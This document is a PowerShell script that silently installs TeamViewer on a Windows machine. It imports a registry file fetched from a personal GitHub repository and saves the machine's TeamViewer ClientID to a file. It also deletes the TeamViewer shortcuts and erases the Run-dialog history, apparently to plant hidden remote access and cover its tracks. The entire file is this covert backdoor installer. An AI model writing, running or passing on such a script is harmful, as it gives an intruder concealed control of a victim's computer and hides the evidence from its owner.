#[tv.ps1]
$ErrorActionPreference='silentlycontinue'
$p="$env:temp"
$i="$p\TeamViewer_Setup.exe"
$r="$p\tv.reg"
iwr -useb "https://dl.teamviewer.com/download/version_15x/TeamViewer_Setup.exe" -o $i
echo + TeamViewer Installer downloaded...
iwr -useb "https://raw.githubusercontent.com/d77juan/t3st1n6/main/tv.reg" -o $r
echo + TeamViewer Reg downloaded...
$l="$p\$env:COMPUTERNAME-TV-ID.txt"
start -wait $i /S
sleep 2
echo + TeamViewer service stopped...
net stop teamviewer
sleep 2
reg import $r
echo + TeamViewer Reg imported...
sleep 2
net start teamviewer
echo + TeamViewer service started...
sleep 2
(Get-ItemProperty -Path 'HKLM:\SOFTWARE\WOW6432Node\TeamViewer' -Name ClientID).ClientID > $l
echo + TeamViewer ClientID dumped...
Remove-Item "$home\Desktop\TeamViewer.lnk"
Remove-Item "$env:public\desktop\TeamViewer.lnk"
echo + TeamViewer lnks deleted...
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name *
echo + Registry RMUs deleted...
echo + TeamViewer installation done...
